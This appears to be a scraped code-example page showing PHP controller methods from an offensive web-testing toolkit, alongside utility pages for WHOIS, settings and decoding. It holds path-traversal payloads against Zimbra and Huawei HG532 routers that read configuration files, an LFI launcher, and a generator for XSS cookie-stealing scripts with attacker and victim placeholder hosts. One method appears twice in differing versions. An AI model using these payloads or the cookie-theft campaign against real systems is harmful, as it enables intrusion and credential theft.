devoid() public method

Return TRUE if hive key is empty and not cached
public devoid ( $key, &$val = NULL ) : boolean
$key string
$val mixed
return boolean
 /**
  * Show one stored LFI plugin entry and hand the submitted form to its request helper.
  *
  * Loads the record whose `_id` equals `$params['id']` and answers 404 when the
  * resource is dry after loading. Otherwise the submitted fields `POST.url`,
  * `POST.lType`, `POST.lPayload` and `POST.lMethod` are passed to the helper that
  * matches the type. Without an id only the sub-template is selected.
  *
  * NOTE(review): the URL, method and payload are taken from the request hive and
  * forwarded as-is; no validation or access check is visible in this method.
  * Confirm that the helpers or the route configuration restrict who can trigger
  * outbound requests from this server.
  *
  * @param \Base $f3     framework instance
  * @param array $params route parameters; `id` selects the record
  * @return mixed result of the selected helper, otherwise null
  */
 public function viewSingle(\Base $f3, $params)
 {
     // Kept from the original listing; the handle is not used in this method.
     $web = \Web::instance();
     $this->response->data['SUBPART'] = 'larfi_page.html';
     if (!isset($params['id'])) {
         return;
     }

     $this->resource->load(array('_id = ?', $params['id']));
     $this->response->data['POST'] = $this->resource;
     if ($this->resource->dry()) {
         $f3->error(404, 'LFI Plugin not found');
         return;
     }

     $this->response->data['SUBPART'] = 'larfi_page.html';
     $target = $f3->get('POST.url');
     // devoid() is TRUE when the key is empty, so this flags a missing URL.
     $urlMissing = $f3->devoid('POST.url');
     $kind = $f3->get('POST.lType');
     $body = $f3->get('POST.lPayload');
     $verb = $f3->get('POST.lMethod');

     // Loose comparison on purpose: it matches what the original switch did.
     if ($kind == "Generic") {
         \Flash::instance()->addMessage('Exploited by injecting into the URL/Body where applicable', 'info');
         return $this->uri_based_lfi($verb, $urlMissing, $target, $body);
     }
     if ($kind == "Cookie") {
         \Flash::instance()->addMessage('Exploited by injecting into the cookie', 'info');
         return $this->cookie_based_lfi($verb, $urlMissing, $target, $body);
     }
     \Flash::instance()->addMessage('This is an invalid attack type', 'warning');
 }
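 /**
  * Generate the per-target script file for a campaign from the bundled template.
  *
  * On POST, reads `POST.targetUrl`, derives a file name from its host component,
  * replaces the two placeholder URLs in the template and writes the result to
  * `/scripts/<host>.js` below the application root.
  *
  * The host ends up in a file-system path, so it is accepted only when it consists
  * of plain hostname characters. URLs without a usable host are rejected instead of
  * producing a file named `.js`, and template read or write failures are reported
  * rather than ignored.
  *
  * NOTE(review): the target URL is substituted into the script text verbatim. The
  * template is not visible here; if the placeholder sits inside a quoted string,
  * the value should be encoded for that context before substitution.
  *
  * @param \Base $f3 framework instance
  */
 function create_campaign(\Base $f3)
 {
     $this->response->data['SUBPART'] = 'xssrc_campaign.html';
     if ($f3->get('VERB') != 'POST') {
         return;
     }
     if ($f3->devoid('POST.targetUrl')) {
         \Flash::instance()->addMessage('Please enter a Target url to test access once you steal cookies e.g. http://victim.mth3l3m3nt.com/admin', 'warning');
         return;
     }

     $target_url = $f3->get('POST.targetUrl');
     // parse_url() returns null or false when no host can be extracted.
     $c_host = is_string($target_url) ? parse_url($target_url, PHP_URL_HOST) : null;
     // Only letters, digits, dots and hyphens may reach the file name below.
     if (!is_string($c_host) || !preg_match('/\A[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?\z/', $c_host)) {
         \Flash::instance()->addMessage('The Target url does not contain a usable hostname', 'warning');
         return;
     }

     $scripts_dir = $f3->ROOT . $f3->BASE . '/scripts/';
     $template_src = $scripts_dir . 'attack_temp.mth3l3m3nt';
     $campaign_file = $scripts_dir . $c_host . '.js';
     $campaign_address = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/scripts/' . $c_host . '.js';
     $postHome = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/xssr';

     // Read the template directly; copying it first and re-reading the copy gave the same text.
     $contents = file_get_contents($template_src);
     if ($contents === false) {
         \Flash::instance()->addMessage('The campaign template could not be read', 'danger');
         return;
     }
     $contents = str_replace("http://attacker.mth3l3m3nt.com/xssr", $postHome, $contents);
     $contents = str_replace("http://victim.mth3l3m3nt.com/admin/", $target_url, $contents);
     if (file_put_contents($campaign_file, $contents) === false) {
         \Flash::instance()->addMessage('The campaign script could not be written', 'danger');
         return;
     }

     $instructions = \Flash::instance()->addMessage('Attach the script to target e.g. <script src="' . $campaign_address . '"></script>', 'success');
     $this->response->data['content'] = $instructions;
 }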
 /**
  * Zimbra Collaboration Server URI-based LFI check.
  *
  * Sets the check title, selects the result template and forwards the submitted
  * `POST.url` with a fixed request path to uri_based_lfi(). The title below names
  * the affected releases as <=7.2.2 and <=8.0.2.
  *
  * For log review: the request path carries a `skin` parameter made of repeated
  * `../` segments and ends in an encoded NUL byte.
  *
  * @param \Base $f3 framework instance
  * @return mixed result of uri_based_lfi()
  */
 public function zimbra_lfi(\Base $f3)
 {
     // Constructed as in the original listing; the object is not used afterwards.
     $larfi = new Larfi();
     $f3->set('exploit_title', 'Zimbra Collaboration server LFI (Versions: <=7.2.2 and <=8.0.2 )');
     $this->response->data['SUBPART'] = 'lfi_page.html';

     // devoid() is TRUE when the key is empty, so this flags a missing URL.
     $urlMissing = $f3->devoid('POST.url');
     $target = $f3->get('POST.url');
     $requestPath = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";

     return $this->uri_based_lfi($urlMissing, $target, $requestPath);
 }
 /**
  * Huawei HG532e / HG532n / HG532s directory traversal check (cve-2015-7254).
  *
  * The issue is a directory traversal that lets remote attackers read arbitrary
  * files via a .. (dot dot) in an icon/ URI. This method sets the check title,
  * selects the result template and forwards the submitted `POST.url` with a fixed
  * port-and-path suffix to uri_based_lfi().
  *
  * Alternative file read: http://<target_IP>:37215/icon/../../../etc/inittab.
  *
  * For log review: requests to port 37215 whose path starts with `/icon/` and
  * contains `../` segments.
  *
  * @param \Base $f3 framework instance
  * @return mixed result of uri_based_lfi()
  */
 public function huawei_lfi(\Base $f3)
 {
     // Constructed as in the original listing; the object is not used afterwards.
     $larfi = new Larfi();
     $f3->set('exploit_title', 'HUAWEI LFI (cve-2015-7254) Huawei HG532e, HG532n, & HG532s');
     $this->response->data['SUBPART'] = 'lfi_page.html';

     // devoid() is TRUE when the key is empty, so this flags a missing URL.
     $urlMissing = $f3->devoid('POST.url');
     $target = $f3->get('POST.url');
     $requestSuffix = ":37215/icon/../../../etc/defaultcfg.xml";

     return $this->uri_based_lfi($urlMissing, $target, $requestSuffix);
 }
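 /**
  * Send one HTTP request to a submitted URL and display the raw reply.
  *
  * On POST, `POST.url` is checked with Audit::url() and then requested with the
  * method from `POST.means`. For the POST method the `POST.postReceive` field
  * (`a=1&b=2` form) is parsed and sent as the request body. Headers, body and the
  * transport engine of the reply are placed in the response data as plain text.
  *
  * Fixes over the previous revision: the body field was read from the hive key
  * `Post.postReceive`, which differs in case from the `POST.*` keys used everywhere
  * else in this method. The pairs were also split with explode(), so
  * http_build_query() encoded list indexes instead of the submitted names.
  *
  * NOTE(review): Audit::url() is the only gate on the destination. Whether it
  * rejects loopback, link-local or private addresses is not visible here. Confirm
  * that, and keep this route behind authentication, because the server fetches
  * whatever passes the check and echoes the reply.
  *
  * @param \Base $f3 framework instance
  */
 public function generic_request(\Base $f3)
 {
     $web = \Web::instance();
     $this->response->data['SUBPART'] = 'websaccre_generic_request.html';
     if ($f3->get('VERB') != 'POST') {
         return;
     }
     if ($f3->devoid('POST.url')) {
         \Flash::instance()->addMessage('Please enter a url e.g. http://africahackon.com', 'warning');
         return;
     }

     $address = $f3->get('POST.url');
     if (!\Audit::instance()->url($address)) {
         \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'danger');
         return;
     }

     // On shared hosts where safe_mode/open_basedir make cURL fail, the original
     // author's workaround is to add 'follow_location' => FALSE to $options.
     $method = $f3->get('POST.means');
     $options = array('method' => $method);
     if ($method == "POST") {
         $rawBody = $f3->get('POST.postReceive');
         // parse_str() keeps the submitted parameter names; non-string input yields an empty body.
         parse_str(is_string($rawBody) ? $rawBody : '', $postData);
         $options['content'] = http_build_query($postData);
     }

     $reply = $web->request($address, $options);
     if (!$reply) {
         \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'warning');
         return;
     }

     $headerText = implode("\n", $reply['headers']);
     $this->response->data['content'] = "Headers: \n\n" . $headerText . "\n\n Body:\n\n" . $reply['body'] . "\n\n Engine Used: " . $reply['engine'];
 }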
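 /**
  * Hurl.it-like service: send one request to a remote server with a chosen method.
  *
  * On POST, `POST.url` is checked with Audit::url() and requested with the method
  * from `POST.means`; only POST, GET, TRACE, OPTIONS and HEAD are accepted. For
  * POST the `POST.postReceive` field is parsed and sent as the body. Redirects are
  * followed unless the `safe_mode` ini setting is on.
  *
  * Fix over the previous revision: an unsupported method left $request_successful
  * undefined, so the code fell through to the failure check and flashed a second,
  * misleading message. The method is now validated first and the handler returns.
  *
  * NOTE(review): Audit::url() is the only gate on the destination. Whether it
  * rejects loopback, link-local or private addresses is not visible here. With
  * redirects followed, a permitted URL can also bounce to another host, so confirm
  * both points and keep this route behind authentication.
  *
  * @param \Base $f3 framework instance
  */
 public function generic_request(\Base $f3)
 {
     $web = \Web::instance();
     $this->response->data['SUBPART'] = 'websaccre_generic_request.html';
     if ($f3->get('VERB') != 'POST') {
         return;
     }
     if ($f3->devoid('POST.url')) {
         \Flash::instance()->addMessage('Please enter a url e.g. http://africahackon.com', 'warning');
         return;
     }

     $address = $f3->get('POST.url');
     if (!\Audit::instance()->url($address)) {
         \Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'danger');
         return;
     }

     $method = $f3->get('POST.means');
     if (!in_array($method, array('POST', 'GET', 'TRACE', 'OPTIONS', 'HEAD'), true)) {
         \Flash::instance()->addMessage('Unsupported Header Method', 'danger');
         return;
     }

     // ini_get() returns false when the setting does not exist, which also enables following.
     $options = array('method' => $method);
     if ($method === 'POST') {
         $rawBody = $f3->get('POST.postReceive');
         // parse_str() fills $postData by reference; non-string input yields an empty body.
         parse_str(is_string($rawBody) ? $rawBody : '', $postData);
         $options['content'] = http_build_query($postData);
     }
     $options['follow_location'] = ini_get('safe_mode') ? FALSE : TRUE;

     $reply = $web->request($address, $options);
     if (!$reply) {
         \Flash::instance()->addMessage('Something went wrong your request could not be completed.', 'warning');
         return;
     }

     $headerText = implode("\n", $reply['headers']);
     $this->response->data['content'] = "Headers: \n\n" . $headerText . "\n\n Body:\n\n" . $reply['body'] . "\n\n Engine Used: " . $reply['engine'];
 }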
Exemplo n.º 7
 /**
  * Settings page for the unphp.net API key.
  *
  * On POST, stores `POST.unphp_api_key` in the configuration and saves it, or
  * flashes a warning when the field is empty. In every case the current
  * configuration is copied back into the POST hive so the form can show it.
  *
  * NOTE(review): the stored key is copied back into the form data on every
  * request, and no CSRF or authorisation check is visible in this method.
  * Presumably both are enforced by the surrounding controller; confirm.
  *
  * @param \Base $f3 framework instance
  */
 public function api_keys(\Base $f3)
 {
     $this->response->data['SUBPART'] = 'settings_unphp_api.html';
     $config = \Config::instance();

     if ($f3->get('VERB') == 'POST') {
         $keyMissing = $f3->devoid('POST.unphp_api_key');
         if ($keyMissing) {
             \Flash::instance()->addMessage('Please enter an API Key from unphp.net ', 'warning');
         } else {
             $config->set('unphp_api_key', $f3->get('POST.unphp_api_key'));
             \Flash::instance()->addMessage('Configuration saved', 'success');
             $config->save();
         }
     }

     $config->copyto('POST');
 }
 /**
  * WHOIS lookup page.
  *
  * On POST, passes `POST.hostname` to Web::whois() and places the answer in the
  * response data; an empty field or a falsy lookup result produces a warning.
  *
  * NOTE(review): the hostname reaches the lookup without any format check in this
  * method. Whether Web::whois() validates it is not visible here; confirm.
  *
  * @param \Base $f3 framework instance
  */
 public function getwhois(\Base $f3)
 {
     $client = \Web::instance();
     $this->response->data['SUBPART'] = 'websaccre_whois.html';
     if ($f3->get('VERB') != 'POST') {
         return;
     }

     if ($f3->devoid('POST.hostname')) {
         \Flash::instance()->addMessage('Please enter a hostname e.g. africahackon.com', 'warning');
         return;
     }

     $record = $client->whois($f3->get('POST.hostname'));
     if ($record) {
         $this->response->data['content'] = $record;
     } else {
         \Flash::instance()->addMessage('You have entered an invalid hostname try something like: africahackon.com', 'warning');
     }
 }
Exemplo n.º 9
 /**
  * General settings page: blog title, SSL backend and comment auto-approval.
  *
  * On POST the two flags are always set on the configuration object from their
  * form values (`'1'` means on). The title is set only when it is not empty, and
  * the configuration is saved only when the title was supplied. The current
  * configuration is then copied into the POST hive for the form.
  *
  * NOTE(review): no CSRF or authorisation check is visible in this method;
  * presumably the surrounding controller enforces both. Confirm.
  *
  * @param \Base $f3 framework instance
  */
 public function general(\Base $f3)
 {
     $this->response->data['SUBPART'] = 'settings_general.html';
     $config = \Config::instance();

     if ($f3->get('VERB') == 'POST') {
         $titleMissing = $f3->devoid('POST.blog_title');
         if ($titleMissing) {
             \Flash::instance()->addMessage('Please enter a Blog Title', 'warning');
         } else {
             $config->set('blog_title', $f3->get('POST.blog_title'));
         }

         // The flags are applied to the in-memory config even when the title is missing.
         $config->set('ssl_backend', $f3->get('POST.ssl_backend') == '1');
         $config->set('auto_approve_comments', $f3->get('POST.auto_approve_comments') == '1');

         if (!$titleMissing) {
             \Flash::instance()->addMessage('Config saved', 'success');
             $config->save();
         }
     }

     $config->copyto('POST');
 }
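 /**
  * Decode submitted text from base64, hex (bare, `0x`- or `\x`-prefixed) or rot13.
  *
  * On POST, reads `POST.encoded` and `POST.encodedFormat`, decodes accordingly and
  * stores the result in the response data, or flashes a warning describing why the
  * input was rejected.
  *
  * Fixes over the previous revision: hex input was validated with
  * is_numeric('0x' . $s), which no longer accepts hexadecimal notation since
  * PHP 7, so every hex string was reported invalid there. The three hex branches
  * now share one helper that checks the digits directly and requires an even
  * length, which hex2bin() needs. Non-string input is rejected up front.
  *
  * NOTE(review): the decoded bytes are arbitrary user-controlled data; confirm
  * that the template escapes `content` before output.
  *
  * @param \Base $f3 framework instance
  */
 public function decoder_multi(\Base $f3)
 {
     $this->response->data['SUBPART'] = 'dencoder_decoder_multi.html';
     if ($f3->get('VERB') != 'POST') {
         return;
     }
     if ($f3->devoid('POST.encoded')) {
         \Flash::instance()->addMessage('Please enter Some text to decode e.g. 0xaaaa ', 'warning');
         return;
     }

     $encoded_text_string = $f3->get('POST.encoded');
     if (!is_string($encoded_text_string)) {
         // An array-valued field cannot be decoded by any branch below.
         \Flash::instance()->addMessage('Seems You have Broken something or text is invalid \\n I can\'t process', 'warning');
         return;
     }

     switch ($f3->get('POST.encodedFormat')) {
         case "base64":
             $candidate = trim($encoded_text_string);
             // A round trip that reproduces the input means the text is canonical base64.
             if (base64_encode(base64_decode($candidate)) === $candidate) {
                 $this->response->data['content'] = base64_decode($candidate, true);
             } else {
                 \Flash::instance()->addMessage('Please enter a valid base 64 string e.g. dGVzdG1l ', 'warning');
             }
             break;
         case "hex":
             $this->decode_hex_to_response(trim($encoded_text_string));
             break;
         case "hex_0x":
             $this->decode_hex_to_response(trim(str_replace("0x", "", $encoded_text_string)));
             break;
         case "hex_slash_x":
             $this->decode_hex_to_response(trim(str_replace("\\x", "", $encoded_text_string)));
             break;
         case "rot13":
             $this->response->data['content'] = str_rot13(trim($encoded_text_string));
             break;
         default:
             \Flash::instance()->addMessage('Seems You have Broken something or text is invalid \\n I can\'t process', 'warning');
     }
 }

 /**
  * Decode a string of hex digit pairs into the response data, or flash why it cannot be done.
  *
  * @param string $hex candidate digits with any prefix already removed
  */
 private function decode_hex_to_response($hex)
 {
     // Whole pairs of hex digits only; odd-length input would make hex2bin() fail.
     if (!preg_match('/\A(?:[0-9A-Fa-f]{2})+\z/', $hex)) {
         \Flash::instance()->addMessage('Invalid Hexadecimal String detected, check for trailing spaces or invalid characters then try again.', 'warning');
         return;
     }
     if (!function_exists('hex2bin')) {
         \Flash::instance()->addMessage('Seems you are missing the hex2bin function , this is common with PHP 5.3 and below \\n Sorry I can\'t work this . ', 'warning');
         return;
     }
     $this->response->data['content'] = hex2bin($hex);
 }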